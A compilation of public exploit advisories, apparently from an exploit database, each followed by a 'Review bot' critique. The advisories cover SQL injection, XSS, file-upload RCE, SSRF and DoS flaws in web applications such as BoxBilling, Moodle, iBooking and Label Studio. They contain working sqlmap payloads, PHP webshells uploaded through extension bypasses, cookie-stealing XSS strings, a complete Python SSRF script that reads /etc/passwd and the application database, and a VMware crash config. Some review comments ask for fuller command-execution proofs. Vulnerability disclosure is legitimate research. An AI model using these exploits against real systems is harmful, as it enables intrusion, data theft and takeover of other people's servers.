Payload: -----------------------------120411781422335
Content-Disposition: form-data; name="user_id"
25' AND SLEEP(5) AND 'HGWF'='HGWF
-----------------------------120411781422335
Content-Disposition: form-data; name="email"
otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"
puneeth@123
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"
-----------------------------120411781422335--
---
[16:25:28] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
# Vulnerability Type: SQL Injection - #2
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89
Vulnerability description: Online shopping system advanced 1.0 allows SQL
injection via the action.php, proId parameter.
Proof of concept:
Save this content in a file:
POST http://127.0.0.1/online/action.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Host: 127.0.0.1
addToCart=1&proId=70
And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId
POST parameter 'proId' is vulnerable. Do you want to keep testing the
others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 72
HTTP(s) requests:
---
Parameter: proId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv
---
[16:03:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
# Vulnerability Type: Remote Command Execution (RCE)
CVSS v3: 9.8
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-434
Vulnerability description: File Restriction Bypass vulnerabilities were
found in Online shopping system advanced v1.0. This allows for an
authenticated user to potentially obtain RCE via webshell.
Proof of concept:
1. Go the add product >> (admin/add_product.php)
2.- Select product image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.php
5. Alter request in the upload...
Update 'filename' to desired extension. ex: shell.php
Not neccesary change content type to 'image/png'
Example exploitation request:
====================================================================================================
POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------184982084830387
Content-Length: 960
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_product.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------184982084830387
Content-Disposition: form-data; name="product_name"
demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="details"
demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="picture"; filename="shell.php"
Content-Type: image/gif
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
-----------------------------184982084830387
Content-Disposition: form-data; name="price"
1
-----------------------------184982084830387
Content-Disposition: form-data; name="product_type"
1
-----------------------------184982084830387
Content-Disposition: form-data; name="brand"
1
-----------------------------184982084830387
Content-Disposition: form-data; name="tags"
Summet
-----------------------------184982084830387
Content-Disposition: form-data; name="submit"
-----------------------------184982084830387--
====================================================================================================
6. To view the webshell path go to Product List (admin/cosmetics_list.php)
7. Send the request and visit your new webshell
Ex:
http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami
nt authority\system
# Vulnerability Type: stored Cross-Site Scripting (XSS) - #1
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via the admin/edit_user.php, in
multiple parameter.
Proof of concept:
Stored:
POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------120411781422335
Content-Length: 496
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"
25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"
otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"
</td><script>alert(1);</script><td>
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"
-----------------------------120411781422335--
# Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via the admin/add_user.php, in
multiple parameter.
Proof of concept:
Stored:
POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_user.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save=
# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1
CVSS v3: 6.1
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in
page parameter.
Proof of concept:
Reflected:
http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2
CVSS v3: 6.1
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Online shopping system advanced v1.0, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php,
in page parameter.
Proof of concept:
Reflected:
http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
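Review bot: the two stored XSS entries give CVSS v3 6.5 for the vector `3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`, while the two reflected entries below score the identical vector 6.1, so one of the numbers is wrong; and PR:N is not right for the stored cases in any event, because both PoCs post to `admin/edit_user.php` and `admin/add_user.php` with an admin `PHPSESSID` cookie and an admin-panel `Referer`, which is authenticated access. Set PR to the privilege of the admin account and recompute the score. For the upload PoC, the `whoami` response `nt authority\system` shows the test web server running as SYSTEM; that is a property of the test setup and should be called out as such rather than left implied as the general impact. The upload also sends `shell.php` with `Content-Type: image/gif`, so the advisory should say which check that bypasses (MIME sniffing versus extension filtering) since that decides which deployments are affected.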

@ -0,0 +1,13 @@
# Exploit Title: Jetpack 11.4 - Cross Site Scripting (XSS)
# Date: 2022-10-19
# Author: Behrouz Mansoori
# Software Link: https://wordpress.org/plugins/jetpack
# Version: 11.4
# Tested on: Mac m1
# CVE: N/A
1. Description:
This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert(document.cookie)</script>
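Review bot: the description and the PoC do not describe the same issue: the text names "the slider import search feature and tab parameter via plugin settings", while the PoC injects into `post_id` of `modules/contact-form/grunion-form-view.php`, and that path is given relative to `http://localhost/` with no WordPress plugin directory in front of it, so it cannot be reproduced as written. State which parameter is actually reflected, give the full path of the file under the WordPress install, and say whether an authenticated session is needed. `Tested on: Mac m1` names hardware; the WordPress and PHP versions used are what a reader needs.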

@ -0,0 +1,34 @@
# Exploit Title: BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)
# Date: 2022-09-18
# Exploit Author: zetc0de
# Vendor Homepage: https://www.boxbilling.org/
# Software Link:
https://github.com/boxbilling/boxbilling/releases/download/4.22.1.5/BoxBilling.zip
# Version: <=4.22.1.5 (Latest)
# Tested on: Windows 10
# CVE : CVE-2022-3552
# BoxBilling was vulnerable to Unrestricted File Upload.
# In order to exploit the vulnerability, an attacker must have a valid
authenticated session as admin on the CMS.
# With at least 1 order of product an attacker can upload malicious file to
hidden API endpoint that contain a webshell and get RCE
###################################################################################
## POC
POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
Host: local.com:8089
Content-Length: 52
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d
Connection: close
order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>
POC Video :
https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing
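Review bot: the PoC shows only the upload request; nothing in it shows where `path=ax.php` is written or the request that executes it, so the RCE claim rests entirely on the linked video. Add the directory that `Filemanager/save_file` writes into (and relative to which root), a GET that confirms the file is served as PHP, and a payload that demonstrates command execution rather than `phpinfo()`. The `order_id=1` value ties back to the "at least 1 order" precondition in the header; a one-line comment next to the request saying why it is required would save the reader the inference.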

@ -0,0 +1,17 @@
# Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)
# Date: 2022-08-10
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://intelliants.com/
# Version: 4.2.1
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Go to the following url. => http://(HOST)/panel/fields/add
2- Write XSS Payload into the tooltip value of the field add page.
3- Press "Save" button.
4- Go to the following url. => http://(HOST)/panel/members/add
XSS Payload ==> "<script>alert("field_tooltip_XSS")</script>
Reference: ://github.com/intelliants/subrion/issues/895
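Review bot: the Reference line is missing its scheme (`://github.com/intelliants/subrion/issues/895`) and there is no Software Link, so the advisory cannot be followed to either the vendor issue or the tested build. The PoC also needs privileged access that the header does not mention: both `/panel/fields/add` and `/panel/members/add` are admin-panel pages, so this is an admin-stored payload fired at whoever opens the members form, and the required role should be stated. Name the sink (the field "tooltip" value) in the description rather than only in step 2.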

@ -0,0 +1,27 @@
# Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS)
# Date: 26/10/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://moodle.org/
# Software Link: https://git.in.moodle.com/moodle
# Version: 4.0
# Tested on: XAMPP, Windows 10
# Contact: https://twitter.com/dmaral3noz
Description:
A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public License
Vulnerable Code:
line 111 in file "course/search.php"
echo $courserenderer->search_courses($searchcriteria);
Steps to exploit:
1) Go to http://localhost/course/search.php
2) Insert your payload in the "search"
Proof of concept (Poc):
The following payload will allow you to run the javascript -
"><img src=# onerror=alert(document.cookie)>
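Review bot: the description is a run-on ("A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source ...") and the "Vulnerable Code" evidence does not establish the bug: `echo $courserenderer->search_courses($searchcriteria);` is a renderer call, and nothing shown proves that the `search` value reaches the page unescaped. Either show the renderer code path that outputs the value without escaping, or include the HTTP response in which `"><img src=# onerror=alert(document.cookie)>` comes back intact. Also say whether this is reflected or stored and whether a logged-in user is required; the title only says "Cross-Site Scripting".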

@ -0,0 +1,53 @@
## Title: Social-Share-Buttons v2.2.3 - SQL Injection
## Author: nu11secur1ty
## Date: 09.16.2022
## Vendor: https://wordpress.org/
## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3
## Description:
The `project_id` parameter from the Social Share Buttons-2.2.3 on the
WordPress-6.0.2 system appears to be vulnerable to SQL injection
attacks.
The malicious user can dump-steal the database, from this system and
he can use it for very malicious purposes.
WARNING: The attacker can retrieve all-database from this system!
NOTE: The users of this system are NOT protected, this SQL
vulnerability is CRITICAL!
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: project_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=social-sharing-share&project_id=378116348' or
'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=social-sharing-share&project_id=378116348' or
'3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND
'KWbC'='KWbC&network_id=5&post_id=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3)
## Proof and Exploit:
[href](https://streamable.com/m9r76w)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
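Review bot: the request target is missing: the payload block is sqlmap output for `project_id (POST)` with `action=social-sharing-share`, but the URL the POST is sent to is never given (the `action` parameter suggests a WordPress AJAX endpoint, which is a guess the advisory should confirm), nor whether an unauthenticated visitor can reach it. Add the request line and the required authentication. The severity lines contradict each other ("STATUS: HIGH" next to "CRITICAL") and have no vector behind them. The mail signature pasted at the end (from "System Administrator - Infrastructure Engineer" down to the `nu11secur1ty <http://nu11secur1ty.com/>` line) is not part of the advisory and should be removed from the file.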

@ -0,0 +1,41 @@
# Exploit Title: iBooking v1.0.8 - Arbitrary File Upload
# Exploit Author: d1z1n370/oPty
# Date: 01/11/2022
# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088
# Tested on: Linux
# Version: 1.0.8
# Exploit Description:
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
# PoC request
POST https://localhost/dashboard/upload-new-media HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/dashboard/settings
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062
Content-Length: 449
Connection: close
Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="_token"
kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="is_modal"
1
-----------------------------115904534120015298741783774062
Content-Disposition: form-data; name="file"; filename="upload.php56"
Content-Type: image/gif
GIF89a;
<?php system($_GET['a']); phpinfo(); ?>
-----------------------------115904534120015298741783774062--
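Review bot: the PoC stops at the upload request and never shows the stored file being reached or `?a=` executing, so "execute commands" is asserted rather than demonstrated; add the response with the stored path and a GET that runs a command. Two things the PoC depends on should also be stated explicitly: the request carries a Laravel `_token` and a session cookie, so this is an authenticated dashboard user (the header says nothing about required privileges); and `filename="upload.php56"` only executes if the web server's handler mapping treats `.php56` as PHP, which is a property of the test box, not of the application, and decides whether this is RCE or just an unrestricted upload on most deployments.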

@ -0,0 +1,63 @@
## Title: Senayan Library Management System v9.5.0 - SQL Injection
## Author: nu11secur1ty
## Date: 11.03.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0
## Description:
The `keywords` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the keywords parameter, and a general
error message was returned.
Two single quotes were then submitted and the error message
disappeared. The injection is confirmed manually from nu11secur1ty.
The attacker can retrieve all information from the database of this
system, by using this vulnerability.
## STATUS: HIGH Vulnerability
[+] Payload:
```MySQL
---
Parameter: keywords (GET)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT
SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))
RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)
## Proof and Exploit:
[href](https://streamable.com/63og5v)
## Time spent
`3:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
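Review bot: the request target is missing: the sqlmap output names `keywords (GET)` and shows `csrf_token`, `search=search` and the injected `keywords` value, but not the path the request goes to, so the finding cannot be reproduced from the file; add the request line. Also say whether the search page is reachable without login, since the description only says "the attacker". The mail signature block is pasted twice at the end (the same lines from "System Administrator - Infrastructure Engineer" to `nu11secur1ty <http://nu11secur1ty.com/>`, once above the `--` separator and once below) and should be removed together with "Time spent".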

@ -0,0 +1,67 @@
## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 11.03.2022
## Vendor: https://www.rukovoditel.net/
## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1
## Description:
The application is vulnerable to DOM-based cross-site scripting
attacks. Data is read from `location.hash` and passed to
`jQuery.parseHTML`.
The attacker can use this vulnerability to create an unlimited number
of accounts on this system until it crashed.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Payload:
```POST
GET /rukovoditel/index.php?module=users/restore_password HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;
cookie_test=please_accept_for_session;
app_login_redirect_to=module%3Ddashboard%2F
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/login
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)
## Proof and Exploit:
[href](https://streamable.com/i1qmfk)
## Time spent
`3:45`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
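Review bot: the "Payload" block contains no payload: it is a plain `GET /rukovoditel/index.php?module=users/restore_password` request with no URL fragment, yet the description says the sink is `location.hash` passed to `jQuery.parseHTML`; a fragment never reaches the server, so an HTTP request is the wrong artefact, and the actual `#...` value plus the client-side line that parses it should be given instead. The impact claim ("create an unlimited number of accounts on this system until it crashed") does not follow from a DOM XSS on the password-reset page and nothing shown supports it; demonstrate it or drop it together with the "CRITICAL" label. The fence is tagged `POST` for a GET request, and the mail signature block is pasted twice at the end and should be removed.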

@ -0,0 +1,196 @@
# Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)
# Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition"
# Date: 2022-10-03
# Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com
# Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/
# Software Link: https://github.com/heartexlabs/label-studio/releases
# Version: <=1.5.0
# CVE : CVE-2022-36551
# Docker Container: heartexlabs/label-studio
# Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition
# versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system.
# Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote
# attacker to create a new account and then exploit the SSRF.
#
# This exploit has been tested on Label Studio 1.5.0
#
# Exploit Usage Examples (replace with your target details):
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3
import json
import argparse
import requests
import shutil
from urllib.parse import urljoin
from urllib.parse import urlparse
requests.packages.urllib3.disable_warnings()
# main function for exploit
def main(url, filePath, writePath, username, password, shouldRegister):
# check if the URL is reachable
try:
r = requests.get(url, verify=False)
if r.status_code == 200:
print("[+] URL is reachable")
else:
print("[!] Error: URL is not reachable, check the URL and try again")
exit(1)
except requests.exceptions.RequestException as e:
print("[!] Error: URL is not reachable, check the URL and try again")
exit(1)
session = requests.Session()
login(session, url, username, password, shouldRegister)
print("[+] Logged in")
print("[+] Creating project...")
# Create a temp project
projectDetails = create_project(session, url)
print("[+] Project created, ID: {}".format(projectDetails["id"]))
#time for the actual exploit, import a "file" to the newly created project (IE: file:///etc/passwd, or file:///proc/self/environ)
print("[+] Attempting to fetch: {}".format(filePath))
fetch_file(session, url, projectDetails["id"], filePath, writePath)
print("[+] Deleting Project.. {}".format(projectDetails["id"]))
delete_project(session, url, projectDetails["id"])
print("[+] Project Deleted")
print("[*] Finished executing exploit")
# login, logs the user in
def login(session, url, username, password, shouldRegister):
# hit the main page first to get the CSRF token set
r = session.get(url, verify=False)
r = session.post(
urljoin(url, "/user/login"),
data={
"email": username,
"password": password,
"csrfmiddlewaretoken": session.cookies["csrftoken"],
},
verify=False
)
if r.status_code == 200 and r.text.find("The email and password you entered") < 0:
return
elif r.text.find("The email and password you entered") > 0 and shouldRegister:
print("[!] Account does not exist, registering...")
r = session.post(
urljoin(url, "/user/signup/"),
data={
"email": username,
"password": password,
"csrfmiddlewaretoken": session.cookies["csrftoken"],
'allow_newsletters': False,
},
)
if r.status_code == 302:
# at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default)
return
else:
print("[!] Error: Could not login, check the credentials and try again")
exit(1)
# create_project creates a temporary project for exploiting the SSRF
def create_project(session, url):
r = session.post(
urljoin(url, "/api/projects"),
data={
"title": "TPS Report Finder",
},
verify=False
)
if r.status_code == 200 or r.status_code == 201:
return r.json()
else:
print("[!] Error: Could not create project, check your credentials / permissions")
exit(1)
def fetch_file(session, url, projectId, filePath, writePath):
# if scheme is empty prepend file://
parsedFilePath = urlparse(filePath)
if parsedFilePath.scheme == "":
filePath = "file://" + filePath
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
url = urljoin(url, "/api/projects/{}/import".format(projectId))
r = session.post(url,
data={
"url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL
},
headers=headers,
verify=False
)
if r.status_code == 201:
# file found! -- first grab the file path details
fileId = r.json()["file_upload_ids"][0]
r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False)
r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True)
print("[+] File found!")
# if user wants to write to disk, make it so
if writePath != None:
print("[+] Writing to {}".format(writePath))
# write the file to disk
with open(writePath, 'wb') as handle:
shutil.copyfileobj(r.raw, handle)
handle.close()
return
else:
print("==========================================================")
print(r.text)
print("==========================================================")
return
else:
print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ")
print("\t" + r.json()["validation_errors"]["non_field_errors"][0])
return
def delete_project(session, url, projectId):
url = urljoin(url, "/api/projects/{}".format(projectId))
r = session.delete(url, verify=False)
if r.status_code == 200 or r.status_code == 204:
return
else:
print( "[!] Error: Could not delete project, check your credentials / permissions")
exit(1)
parser = argparse.ArgumentParser()
parser.add_argument("--url", required=True, help="Label Studio URL")
parser.add_argument("--file", required=True, help="Path to the file you want to fetch")
parser.add_argument("--out", required=False, help="Path to write the file. If omitted will be written to STDOUT")
parser.add_argument("--username", required=False, help="Username for existing account (email)")
parser.add_argument("--password", required=False, help="Password for existing account")
parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist",
)
args = parser.parse_args()
main(args.url, args.file, args.out, args.username, args.password, args.register)
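Review bot: the `--register` path in `login()` cannot succeed as written: `requests` follows redirects by default, so after the signup POST `r.status_code` is the final page's 200, never 302, and `if r.status_code == 302:` falls through to "Could not login" and `exit(1)` even when the account was created. Pass `allow_redirects=False` to that post, or test for a logged-in marker such as the session cookie, instead of the status code. The same call is also the only request in the file without `verify=False`, so it fails against a self-signed TLS target while every other call succeeds. Minor: `elif r.text.find(...) > 0` should be `>= 0`; `handle.close()` inside the `with` block is redundant; and the error branch of `fetch_file` indexes `r.json()["validation_errors"]["non_field_errors"][0]` without checking the keys exist, so any other 4xx body raises a `KeyError` instead of printing the message.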

@ -0,0 +1,127 @@
#Title: VMware Workstation 15 Pro - Denial of Service
#Author: Milad Karimi
#Date: 2022-10-17
#Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 15 Pro (15.5.6 build-16341506)
#Affected: VMware Workstation Pro/Player 15.x
config.version = "8"
virtualHW.version = "4"
displayName = "credit's to Ex3ptionaL for find this vouln"
annotation = "Live CD ISO http://www.irongeek.com"
guestinfo.vmware.product.long = "credit's to Ex3ptionaL for find this vouln"
guestinfo.vmware.product.url = "http://www.millw0rm.com"
guestinfo.vmware.product.short = "LCDI"
guestinfo.vmware.product.version.major = "1"
guestinfo.vmware.product.version.minor = "0"
guestinfo.vmware.product.version.revision = "0"
guestinfo.vmware.product.version.type = "release"
guestinfo.vmware.product.class = "virtual machine"
guestinfo.vmware.product.build = "1.0.0rc8-20051212"
uuid.action = "create"
guestOS = "winxppro"
#####
# Memory
#####
memsize = "20000000000000"
# memsize = "300000000000000000000000000000"
# memsize = "400000000000000000000"
